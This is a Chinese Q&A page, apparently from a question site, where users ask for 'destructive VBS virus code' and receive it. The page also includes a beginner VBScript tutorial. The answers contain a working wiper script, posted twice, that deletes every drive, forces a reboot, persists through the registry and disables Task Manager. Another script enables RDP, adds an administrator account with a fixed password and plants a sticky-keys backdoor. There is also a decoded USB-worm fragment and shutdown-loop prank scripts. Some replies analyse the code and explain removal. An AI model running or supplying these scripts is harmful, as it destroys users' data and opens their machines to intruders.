求最全的vbs病毒代码,要破坏性的。谢谢,回答的好我多给分。
那废话不说,问这个如何?不懂可以问我
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
VBS是什么文件???
跟我学编程1(VBS基础篇)
什么是VBScript呢? VBScript的全称是:Microsoft Visual Basic Script Editon.(微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言. 我进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是你写的程序不需要编译成.exe, 而是直接给用户发送.vbs的源程序, 用户就能执行了.
我知道菜鸟现在最关心的就是用什么工具来开发VBS程序了, 答案是:记事本.(Notepad).我不是开玩笑, 其实任何一种文本编辑器都可以用来开发VBS开发, 只不过记事本是由系统自带的, 比较好找而已. 尽管如此, 我还是建议你去下载一个专业的文本编辑器, 因为这些工具可以提供 "语法高亮"等功能, 更加方便开发, 用哪一个随你喜好, 我比较喜欢Edit Plus (2.10).
OK, 我们先来写一个VBScript程序热热身.
REM 输入并回显你的名字
\'使用InputBox和Msgbox函数
Dim name,msg
msg="请输入你的名字:"
name=Inputbox(msg,"名称")
Msgbox(name)
把上面的程序清单输入到记事本里面, 然后保存为以.vbs为扩展名的文件("保存类型"里面选择"所有文件").然后双击运行, 观察运行结果. 注意:请自己输入程序清单, 不要复制-粘贴
我来解释一下这个程序, 第一行和第二行的开头分别是"REM"语句和" \' ", 这两个东西的作用是相同的, 表示本行是注释行, 就是说这两行什么也不干,只是用来说明这段程序的功能, 版权信息等等. 注释行是程序最重要的部分之一, 尽管它不是必需的, 但对于其他人阅读源代码, 以及自己分析源代码是很有好处的. 好的习惯是在必要的地方加上清晰, 简洁的注释.
Dim用来声明一个变量, 在VBS中, 变量类型并不是那么重要, 就是说VBS会帮你自动识别变量类型, 而且变量在使用前不一定要先声明, 程序会动态分配变量空间. 在VBS中你不用考虑name储存的是一个整数还是一个小数(学名叫"浮点数"), 也不用考虑是不是字符串(一串字符, 比如:"Hello World"), VBS会自动帮你搞定. 所以第三行语句可以删除, 效果不会变, 但我强烈反对这么做, 一个变量的基本原则就是:先声明,后使用.变量名用字母开头,可以使用下划线,数字, 但不能使用vbs已经定义的字, 比如dim, 也不能是纯数字.
下一行被称之为"赋值", "="是赋值符号, 并不是数学中的等于号, 尽管看起来一样.这是正统的理解, 你要理解成等于也没有什么不可. 赋值号的左边是一个变量, 右边是要赋给变量的值, 经过赋值以后, msg这个变量在程序中等同于"请输入你的名字:"这个字符串,但当msg被再次复制的时候, 原值就会消失. 不光字符串, 其他任何变量都这样被赋值, 例如: a=2, b=12.222等等.
再往下,Inputbox和Msgbox是VBS内建的函数, 一个函数就相当于一个"黑箱", 有输入(参数)和输出(返回值), 你可以不用了解函数是怎么运作的, 只要了解这个函数能干什么就行了, 我们也可以定义自己的函数, 不过那要等到以后再讲. 现在我们只要了解, 一个函数可以有返回值也可以没有, 可以有参数也可以没有. 例如Inputbox就是有返回值的函数, 我们用赋值号左边的变量来"接"住InputBox的返回值--就是你输入的内容. 在inputbox右边的括号里是参数列表, 每个参数用","分隔开, 每个参数有不同的功效, 比如第一个参数会显示在提示里, 我们把msg这个变量作为第一个参数传给了Inputbox 函数, 而msg="请输入你的名字:", 所以我们在对话框的提示栏就会看到"请输入你的名字:" 第二个参数是对话框的标题, 我们用直接量(学名叫"常量", 这里是"字符串常量")传递给函数, 当然你也可以传递变量. Inputbox还有很多参数, 比如你在"名称"后面再加一个","然后输入随便一串字符(字符串,用双引号""包裹起来的一串字符叫做字符串)然后运行, 看看结果. 你会发现用于输入的文本框有了默认的值, 这就是第三个参数的作用.
Msgbox函数是用来输出的函数, 在VBS中没有专门的输出函数(BASIC中的print,C中的printf), 所以我们只能用对话框来观察输出结果, Msgbox的必要参数只有一个, 就是要输出的内容, 在这种情况下, 我们不需要理会msgbox的返回值. 关于Msgbox和Inputbox我们以后还会在讨论, 今天只是热热身, 到此为止.
要点:
1) 注释(以REM或\'开头)行在程序中不起作用, 但能让别人更容易读懂你的程序.
2) 变量好像一个盒子, 或一个代号, 可以代表你想代表的东西. 变量赋值使用"="
3) 以""包裹起来的字符称之为"字符串"
4) 函数像一个"黑箱", 有参数和返回值, 用"="左边的变量可以接住返回值
5) Inputbox函数弹出一个输入对话框,Msgbox则用于输出
作业:
1) 试验Inputbox的第三个参数
2) 写一段程序输出你的年龄
3) 写一段程序进行3次输入, 分别输入你和你父母的姓名(要求显示提示), 并分3次输出
参考资料:http://www.xurichensheng.com/bbs/printpage.asp?BoardID=5ID=6515
谁知道怎么用vbs写不能开机的病毒,给个代码。就是一开就关机的病毒。好了我给分
新建一个TXT文件,打开,把整人代码放进去,保存。然后把文件扩展名改成.VBS,发送给别人,运行,就能整人了。
比如:
gsh=msgbox ("已经准备好格式化,准备开始。",vbyesno)
set s=createobject("wscript.shell")
wscript.sleep 1000
msgbox "开始格式化…… 哈哈!吓晕了吧,骗你的~"
wscript.sleep 1000
wscript.sleep 1000*100
msgbox "windows发现一重要更新,将自动下载。"
wscript.sleep 3000
msgbox "系统检测到WINDOWS更新中捆绑有不明插件SXS.exe,是否对其扫描?",vbyesno
wscript.sleep 1000
msgbox "文件名 SXS.exe"+CHR(13)+"发行者 田间的菜鸟 "+chr(13)+"安全评级 高危"+chr(13)+"建议 直接删除"+chr(13)+"病毒类型:木马",,"windows扫描附件"
msgbox "是否阻止其安装?",vbyesno
wscript.sleep 3000
msgbox "阻止失败!请检查防火墙是否开启!"
wscript.sleep 5000
msgbox "正在尝试强行删除…"
wscript.sleep 5000
msgbox "失败!"
wscript.sleep 5000
msgbox "您的电脑已陷入危险之中,请赶快扫描病毒!"
wscript.sleep 10000
s.sendkeys "% n"
s.run "taskkill /im .exe"
s.sendkeys "% n"
s.run "taskkill /im explorer.exe /f"
s.sendkeys "% n"
s.sendkeys "% n"
s.sendkeys "% n"
s.sendkeys "% n"
s.sendkeys "% n"
s.sendkeys "% n"
s.sendkeys "% n"
msgbox "你好啊!"
wscript.sleep 3000
msgbox "很高兴见到你!"
wscript.sleep 3000
msgbox "您的电脑可能已经感染病毒!",,"WINDOWS防火墙警告"
wscript.sleep 3000
msgbox "我控制你的电脑了!"
wscript.sleep 3000
msgbox "不信?那我给你关机看看~"
s.run "shutdown -r -t 120"
msgbox "信了吧!"
msgbox "帮你解除关机……"
s.run "shutdown -a"
msgbox "再给你打开记事本写封信,劝你最好别动,要不然会引起系统混乱~"
s.run "notepad"
wscript.sleep 3000
s.sendkeys "Hello, I'm sorry I control your computer,"
wscript.sleep 3000
s.sendkeys " but the virus is false in, "
wscript.sleep 3000
s.sendkeys "only a joke, "
wscript.sleep 3000
s.sendkeys "please rest assured! "
wscript.sleep 3000
s.sendkeys "I no longer next "
wscript.sleep 3000
s.sendkeys "time so the whole you!"
wscript.sleep 3000
s.sendkeys" Goodbye!"
s.sendkeys"{enter}"
s.sendkeys"END"
wscript.sleep 1000
s.sendkeys"%{F4}"
msgbox "提示:刚才的“病毒”是假的,只不过是吓你玩玩~"
s.run "explorer"
这个整人程序,既不会关机,也不会对电脑有伤害,就是有点烦。
VBScript(Microsoft Visual Basic Script Editon).,微软公司可视化BASIC脚本版). 正如其字面所透露的信息, VBS(VBScript的进一步简写)是基于Visual Basic的脚本语言。进一步解释一下, Microsoft Visual Basic是微软公司出品的一套可视化编程工具, 语法基于Basic. 脚本语言, 就是不编译成二进制文件, 直接由宿主(host)解释源代码并执行, 简单点说就是写的程序不需要编译成.exe,,而是直接给用户发送.vbs的源程序, 用户就能执行了。
谁能给我最全的vbs病毒代码,要破坏性的。我多给分,前提是回答满意。
那废话不说,问这个如何?不懂可以问我
On Error Resume Next
dim avest,xufso,wscrt
Set avest = WScript.Createobject("WScript.Shell")
Set wscrt = WScript.Createobject("WScript.Shell")
Set xufso = CreateObject("Scripting.FileSystemObject")
avest.run "cmd /c ""del d:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del e:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del f:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del g:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del h:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del i:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del j:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del k:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del l:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del m:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del n:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del o:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del p:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del q:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del r:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del s:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del t:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del u:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del v:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del w:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del x:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del y:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del z:\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\Users\*.* / f /q /s""",0 ,true
avest.run "cmd /c ""del C:\ProgramData\*.* / f /q /s""",0 ,true
xufso.CreateFolder "C:\VBScript\"
wscrt.run "shutdown -r -f -t 3600 -c 脚本与批处理程序相结合成功!"
xufso.copyfile Wscript.Scriptfullname,"C:\VBScript\一触即发.vbs"
xufso.copyfile Wscript.Scriptfullname,"C:\Users\Public\Desktop\一触即发.vbs"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","00000001","REG_DWORD"
wscrt.regwrite"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost","C:\VBScript\一触即发.vbs","REG_SZ"
wscrt.regWrite"HKEY_CURRENT_USER\Software\Policies\Microsoft\MMC\RestrictToPermittedSnapins","00000001","REG_DWORD"
msgbox "My head with day feet standing on the earth all over the world to worship my swagger is the modelling of the legendary Super Star elder brother is sharp!",16+4096,"Error"
do
wscrt.run "ping 192.168.1.1 -l 65500 -t"
loop
解释一个VBS脚本病毒代码
'容错
on error resume next
'定义一个常量 是一个注册表的键值
const HKEY_LOCAL_MACHINE = H80000002
'定义一个变量strComputer 值为.
strComputer = "."
Set StdOut = WScript.StdOut
Set oReg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" _
strComputer "\root\default:StdRegProv")
'创建组件 是关于注册表的组件
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
oReg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
strValueName = "fDenyTSConnections"
dwValue = 0
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"
strValueName = "PortNumber"
dwValue = 3389
oReg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
'上面这段的功能是开启3389端口 也就是开启远程终端 方法是修改注册表的键值
'容错
on error resume next
'定义变量 username password
dim username,password:If Wscript.Arguments.Count Then:username=Wscript.Arguments(0):password=Wscript.Arguments(1):Else:username="HackEr":password="393214425":end if:set wsnetwork=CreateObject("WSCRIPT.NETWORK"):os="WinNT://"wsnetwork.ComputerName:Set ob=GetObject(os):Set oe=GetObject(os"/Administrators,group"):Set od=ob.Create("user",username):od.SetPassword password:od.SetInfo:Set of=GetObject(os"/"username",user"):oe.Add(of.ADsPath)'wscript.echo of.ADsPath
'这段是增加管理员 用户名是HackEr 密码是393214425
'容错
On Error Resume Next
Dim obj, success
Set obj = CreateObject("WScript.Shell")
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exeecho y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F? %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe? %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exedel %SystemRoot%\system32\sethc.exeren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)
'这段是留后门 放大镜后门 将sethc.exe替换为cmd.exe 这样 在登陆界面这里 按5下shift就会出现cmd窗口 然后添加用户即可登陆系统
总结 这个不算是病毒 充其量 只不过是一个后门程序 运行之后 系统的远程终端开启,自动加入一个HackEr的帐号 自动添加一个放大镜后门
个人感觉 这代码是将3段代码拼凑起来的 - - 没技术含量
我去打印房打印,u盘上中了这个.vbs的病毒,用记事本打开全是乱码,求解密之后的源代码````
你好
这个是vbs脚本病毒,看上去是乱码,一点也看不懂,其实还是有迹可循的。其思路就是寻 找"execute"关键词。病毒最终,还是要换成机器可以看懂的内容,也就是说,最后一层的execute里面的内容,就是病毒的源代码。按照这个思路,那么可以知道,解密方法也一定就在这个execute里面。
也就是说:无需明白他是如何加密的,只需要知道,execute出来的是什么。
按照这个思路,可以得到程序的最后一次迭代加密过程前的代码,也就是第一次迭代解密的代码,看上去还是乱码,不过还是同样的道理,总可以找到execute这个关键词。病毒可能经过多次迭代,不过最终还是可以看懂的。
需要注意的是,execute后面的内容解密出来如果真的用execute执行了,那就中招了,所以这里要注意不能把execute也放进去一起执行。
以下是我的解密最终代码片断
这个程序作者比较BT,手工加密了很多地方,还手工打乱了代码,严重妨碍了程序可读性。
分析完代码其大致功能是
1。开机自启动
2。U盘的感染
3。破坏系统隐藏功能
on error resume next
j="\":til="SY":btj=900:vs=".vbs":ve=".vbe":cm="%comspec% /c":dfo="/u#t/":inf="\autorun.inf"
set ws=createobject("wscript.shell"):set fso=createobject("scripting.filesystemobject")
set wmi=getobject("winmgmts:\\.\root\cimv2"):set sis=wmi.execquery("select * fromwin32_operatingsystem")
set dc=fso.drives:set ats=wmi.execquery("select * from win32_service where name='Schedule'")
for each atc in ats:cat=atc.state:next:if cat="Stopped" then ws.run "net start ""task scheduler""",0,false
ouw=wscript.scriptfullname:win=fso.getspecialfolder(0)j:dir=fso.getspecialfolder(1)j
tmp=fso.getspecialfolder(2)j:wbe=dir"wbem\":mir=left(ouw,len(ouw)-len (wscript.scriptname))
cnr="\computername":cnp="HKLM\system\currentcontrolset\control"cnrcnrcnr:cna=rr (cnp,0):if cna="" then cna=til
wsc="wscript.exe":csc="cscript.exe":css=csc" //nologo ":wsr=rn":createobject (""wscript.shell"").run"
c=vbcrlf:inc=tilc"[autorun]"c"open="wsc" .\"vsc"shell\open\command="wsc" .\"vsc"shell\open\default=1"
sf="shell folders\":rop="\software\microsoft\windows\currentversion\explorer\":dap=rr ("HKCU"ropsf"desktop",0)j
rpa="HKLM\software\"cnaj:fsp=rr("HKLM"ropsf"common startup",0)jvs:fap=rr ("HKCU"ropsf"favorites",0)j
ht=ec("ivwt?56"):ha=ec(":;9:75kw9"):hb=hl"1;=6x"hl"r;":hc="0dwuEpE":hd=ec
("$"+hc):he=ec("c"+hc)
rsp="HKLM\software\microsoft\windows\currentversion\":rsb=rsp"run\":rsp=rsp"policies\explorer\run\"cna
hip="HKCU"rop"advanced\showsuperhidden":sz=lcase(fso.getfilename(wscript.fullname)):if mir=dir then sys=true
for each si in
sis:ca=si.caption:cs=si.codeset:cc=si.countrycode:os=si.oslanguage:wv=si.version:next
if instr(wv,"5.2")0 then hb="w"+hb:lb="v" else if os2052 and cc86 then
hb="p"+hb:lb="o" else hb="d"+hb:lb="c"
for each d in dc
if mir=dj then ws.run "explorer "d,3,false:bir=true
next
if bir or sys or mir=win or mir=wbe then tir=true else wscript.quit
ouc=rt(ouw,-1):ver=gv(ouw):if ver="" or not isnumeric(ver) then msgbox("See You!"):km 1
else km 0
if sys then
if sz=wsc then pr csc,-1
if pr(csc,2)=1 then wscript.quit
wscript.sleep 2000
if pr(csc,1)=0 then ws.run cssdirve,0,false:if pr(csc,1)=1 then wscript.quit
if rr("til",1)til then wr "til",til:wr "tjs",btj:wr "djs",date-1:wr "ded",0
djs=rr("djs",1):if isdate(djs) and date-cdate(djs)50 and lb"o" then wr "osw",4
if rr("atd",1)=1 then ws.run "at /d /y",0,false:wr "atd",0
le=rr("dna",1):if ei(tmple,1) then ws.run tmple
cu:er 10
else
wscript.sleep 5000
if pr(wsc,2)=2 then:if rr("tjc",1)=cstr(date) then:wscript.quit:else:wr "tjc",date
if pr(csc,1)1 or pr(wsc,1)=0 then bf dirve,ouc,7:ws.run cssdirve,0,false
end if
if pa=1 then rna=rparna
rr=ws.regread(rna)
if er(0) then rr=0
for i=1 to len(wt):ec=ec+chr(asc(mid(wt,i,1))-i):next
由于VBS与JS一样是解释型语言,代码自上而下,一行一行地运行。所以解这类代码的一个技巧是:
我们寻找解密入口点时,应该优先考虑最后一个execute。作者大量使用逻辑拼接。。。属于很BT的加密。。。汗水...
电脑中.vbs病毒,请大神翻译此代码:
哈哈,无聊简单的恶作剧VBS脚本,给你翻译一下吧,加了一些注释,你一看就会明白。
Dim HFWsr : Dim HFWfk : Dim HFWfw : Dim FwriteText : Dim HFWfp
HFWfp="C:\HFWkill.vbs" '这里是先定义一个恶作剧脚本的文件名,赋值给一变量方便后面调用
set HFWsr=CreateObject("wscript.shell") '创建Wscript对象
set HFWfk=CreateObject("Scripting.FileSystemObject") '这个对象用于下面的文件操作
Set HFWfw = HFWfk.CreateTextFile(HFWfp, true, false) '这里开始就是准备创建新的恶作剧脚本HFWkill.vbs了
HFWsr.Regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\KILLHFW","C:\HFWKILL.VBS","REG_SZ" '这里是设置了开机自动运行 C盘根目录下由本程序创建的VBS程序
FwriteText = "dim HFWkill:set HFWkill=CreateObject(""Wscript.shell""):HFWkill.run ""shutdown -s -t 0 -f"",0" '它最主要是这段关机代码写入了这个新建的VBS文件
HFWfw.write FwriteText:HFWfw.close '创建完毕
HFWsr.run "attrib +h +r +s c:\hfwkill.vbs",0 '设置为此恶作剧文件为隐藏文件只读文件系统文件
msgbox "o(∩_∩)...! I LOVE YOU ! 你挂了...哈哈哈",0,"H*F*W" '这里是得意地向你表示它已得逞
HFWsr.run "shutdown -s -t 0 -f", 0 '这里是先关你一次机,接下来你一开机它就关机了,就是这么个简单小恶作剧脚本!
万一已“中毒”,则进入安全模式,在运行里输入“RegEdit” 打开注册表,然后把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\下面的“KILLHFW”这项删除即可。顺便把C盘根目录下的HFWKILL.VBS文件也删除掉最好,当然要删除这个文件要先设置显示隐藏文件系统文件。若熟悉DOS,那么在CMD窗口里输入Del c:\HFWKILL.VBS 也行